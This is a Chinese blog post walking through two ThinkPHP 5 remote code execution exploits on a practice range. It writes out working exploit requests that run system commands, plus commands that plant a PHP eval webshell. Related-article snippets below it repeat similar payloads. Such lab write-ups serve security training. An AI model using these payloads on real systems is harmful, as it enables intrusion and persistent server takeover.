【web攻防】ThinkPHP5.0.23 远程代码执行漏洞,Thinkphp5.0.22/5.1.29远程代码执行漏洞 (Remote Code Execution)安鸾靶场练习

最新推荐文章于 2024-09-08 18:53:34 发布
最新推荐文章于 2024-09-08 18:53:34 发布
阅读量2.2k 收藏 8
点赞数
分类专栏: web攻防学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AAAAAAAAAAAA66/article/details/122241545
版权

前端 安全 web安全

中华人民共和国网络安全法(出版物)_360百科中华人民共和国网络安全法,《中华人民共和国网络安全法》是为保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展而制定的法律。《中华人民共和国网络安全法》由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,自2017年6月1日起施行。https://baike.so.com/doc/24210940-24838928.html

目录

靶场地址

ThinkPHP5.0.23 远程代码执行

详细分析:

 Thinkphp5.0.22/5.1.29远程代码执行

详细分析:

靶场地址

首页 : 安鸾渗透实战平台 - 安鸾学院

ThinkPHP5.0.23 远程代码执行

简介:

ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

详细分析:

ThinkPHP 5.0 * 远程代码执行漏洞分析_tdcoming'blog-CSDN博客_index.php?s=captcha

POC
路径:

index.php?s=captcha

POST传参 我用的是hackbar,用burpsuite也行。

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=

测试过程:

显示当前路径:参数pwd

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

 命令执行成功,接下来上传木马找flag。

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '<?php @eval($_REQUEST["pass"]);?>' > AAA.php

用echo 方式传参 >是重定向的意思  简单分析一下

  • 首先echo 将 <?php @eval($_REQUEST["cmd"]);?> 打印
  • 然后 > 重定向 将echo输出的内容 <?php @eval($_REQUEST["cmd"]);?> 写入AAA.php文件 (同时这里也创建了AAA.php文件)

而且这里不能用 get 和 post  只能用 request

<?php @eval($_GET["cmd"]);?>

<?php @eval($_POST["cmd"]);?>

 这时木马已经上传成功了,

可以用下面的命令查看 (或者直接url/AAA.php 发现是可以进去的 虽然显示为空页面)

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls

蚁剑连接

 

进来之后翻了很久没找到flag 没办法,提示说是在根目录,我一直以为根目录就是HTML哪里。结果还用linux终端模糊查询才找到了flag,真是闹了笑话。

 

 Thinkphp5.0.22/5.1.29远程代码执行漏洞

简介:ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。

其实和上面的利用姿势都差不多

详细分析:

ThinkPHP5 远程代码执行漏洞分析 | 码农网

POC

注意这个是get请求

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=

测试一下 ls 打开目录

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

成功了,接下来就是老姿势了。

先对上传的木马url编码

 上传

payload

把一句话的代码写入 AAA.php文件

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=AAA.php&vars[1][]=%3c%3fphp+%40eval(%24_REQUEST%5b%27pass%27%5d)+%3f%3e

蚁剑连接

顺便打个广告 安鸾的平台的确不错,重要是免费,的确挺适合我这种新手的。(白嫖的确有点不好意思)

参考链接:

Vulnhub-ThinkPHP5 5.0.23 远程代码执行漏洞 - 简书

ThinkPHP 5.0 * 远程代码执行漏洞分析_tdcoming'blog-CSDN博客_index.php?s=captcha

ThinkPHP 5.0.23 远程代码执行 漏洞复现_Senimo-CSDN博客

THINKPHP网站漏洞修复对于远程写入网站木马文件漏洞详情与修补-阿里云开发者社区

ThinkPHP5 远程代码执行漏洞分析 | 码农网

作者水平有限,有任何不当之处欢迎指正。

本文目的是为了传播web安全原理知识,提高相关人员的安全意识,任何利用本文提到的技术与工具造成的违法行为,后果自负! 

AAAAAAAAAAAA66
关注
专栏目录
ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现
千寻的博客
12-19 5476
文章目录漏洞名称漏洞编号漏洞描述影响版本实验环境及准备漏洞发现漏洞复现(数据包)漏洞复现(工具)修复建议摘抄免责声明 漏洞名称 ThinkPHP 5.0.23 远程代码执行漏洞 漏洞编号 CVE-2018-20062 漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名, 导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在
复现ThinkPHP5 5.0.23远程代码执行漏洞
NLXHBM的博客
04-15 448
搜索ThinkPHP5.0.23相关漏洞 2. 发现了 5.0.23Remote Code Execution远程代码执行漏洞) 将该漏洞cp到tp.txt文件并查看 3.burpsuite进行抓包 4.执行命令 5. 写入phpinfo: `echo "<?php phpinfo(); ?>" > /var/www/public/phpinfo.php` 6.查看是否写入: 7.访问http://159.75.16.25:8...
wordpress php执行代码_【漏洞通告】PHP远程代码执行漏洞(CVE-2019-11043)
weixin_39742568的博客
11-23 178
1.综述2019年9月14日至18举办的 Real World CTF中,国外安全研究员 Andrew Danau 在解决一道CTF题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。2019年9月26日,PHP官方发布漏洞通告,其中指出:使用 Nginx + php-fpm的服务器,在部分配置下,存在远程代码执行漏洞.且该配置已被广泛使用,危害较大,影响较为广泛。...
ThinkPHP5 5.0.23-rce远程代码执行漏洞复现
最新发布
A2893992091的博客
09-08 735
其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。判断是否存在漏洞:访问/index.php?s=captcha页面,会出现如下报错。切换目录到vulhub/thinkphp/5.0.23-rce下。使用HackBar 插件发送 POST 请求。端口为:8080,访问网站,搭建成功。访问shell.php,使用蚁剑连接。
ThinkPHP5 5.0.23 远程代码执行漏洞
Yk_GSDN的博客
08-15 428
使用burpsuite抓包软件抓包。2、访问靶机ip+端口号8080。将 GET传参改为POST传参。
[漏洞复现]ThinkPHP5 核心类 Request 远程代码执行
wwxxee
05-20 556
ThinkPHP 5.x 核心类 Request 远程代码执行漏洞复现 影响版本: ThinkPHP 5.0.x ~ 5.0.23 ThinkPHP 5.1.x ~ 5.1.31 ThinkPHP 5.2.0beta1 环境: vulhub-master/thinkphp/5.0.23-rce 启动docker环境之后,访问: http://ip:8080/ POC: POST /index.php?s=captcha HTTP/1.1 Host: 192.168.17.134:8080 User-Age
ThinkPHP5.0.23 远程代码执行漏洞
夜星空如海的博客
09-30 1887
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞
复现ThinkPHP5 5.0.23远程代码执行漏洞 Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
记录笔记
04-12 531
ThinkPHP5 5.0.23远程代码执行漏洞 http://159.75.16.25:8089/index.php?s=captcha会出现如下报错 F12进入开发者 用HackBar 插件发送 POST 请求 得到回显: 通过echo命令写入 Webshell 文件 首先将一句话木马进行 Base64 编码 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWE
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_67813445的博客
03-15 710
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
qq_53409748的博客
03-16 292
vulhub Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
CVE-2019-11043(PHP远程代码执行漏洞
m0_51468027的博客
02-12 9175
一、漏洞描述   CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。   向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。   该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_
Thinkphp5.0.23远程代码执行漏洞复现
02-01 1806
Thinkphp5.0.23远程代码执行漏洞介绍、成因和复现。
[EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution
weixin_30314793的博客
03-14 518
# Exploit Title: ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution # Date: 2018-12-11 # Exploit Author: VulnSpy # Vendor Homepage: https://thinkphp.cn # Software Link: https://github.com/t...
vulhub thinkphp5 5.0.23 远程代码执行漏洞
weixin_53696027的博客
03-15 805
vulhub thinkphp5 5.0.23 远程代码执行漏洞
Thinkphp5.0.23远程命令执行
Cover-3321的博客
01-03 2229
thinkphp远程命令执行漏洞 php的一个开发框架,5,0.23及以前的版本中,获取method的方法中没有正确处理方法 名,导致攻击者可以调用request类任意方法,构造payload,导致远程命令执行
PHP-FPM 远程代码执行漏洞
玄道的网安博客
05-21 2176
漏洞简介 国外安全研究员 Andrew Danau在解决一道 CTF 题目时发现, 向目标服务器 URL 发送 %0a 符号时, 服务返回异常, 疑似存在漏洞 2019年10月23日, github公开漏洞相关的详情以及exp.当nginx配置不当时, 会导致php-fpm远程任意代码执行 影响组件 Nginx + FPM + PHP7 漏洞指纹 Nginx PHP Nextcloud 漏洞分析 该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location
php漏洞cve,「漏洞通告」PHP远程代码执行漏洞(CVE-2019-11043)
weixin_29808375的博客
03-09 1551
1.综述2019年9月14日至18举办的 Real World CTF中,国外安全研究员 Andrew Danau 在解决一道CTF题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。2019年9月26日,PHP官方发布漏洞通告,其中指出:使用 Nginx + php-fpm的服务器,在部分配置下,存在远程代码执行漏洞.且该配置已被广泛使用,危害较大,影响较为广泛。...
php代码执行漏洞,预警!!!PHP 远程代码执行漏洞
weixin_39908588的博客
03-09 263
一、前言2019年10月22日,在github上公开了一个关于PHP的远程代码执行漏洞。斗象智能安全CRS产品已全面支持该漏洞的检测与验证,用户可直接登陆www.riskivy.com 进行验证。二、漏洞简介此漏洞由于不正确的Nginx+php-fpm配置导致服务端存在在处理%0a时存在不正确解析方式,可能导致任意代码执行。三、漏洞危害经斗象安全应急响应团队分析,攻击者可以通过精心构造的请求包在错...
ThinkPHP 5.0 远程代码执行漏洞详解
"ThinkPHP 5.0 远程代码执行漏洞分析" 在网络安全领域,远程代码执行漏洞是一种极其危险的漏洞,允许攻击者在受害者的服务器上执行任意代码。这篇关于ThinkPHP 5.0 远程代码执行的分析报告,专注于探讨了如何利用这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值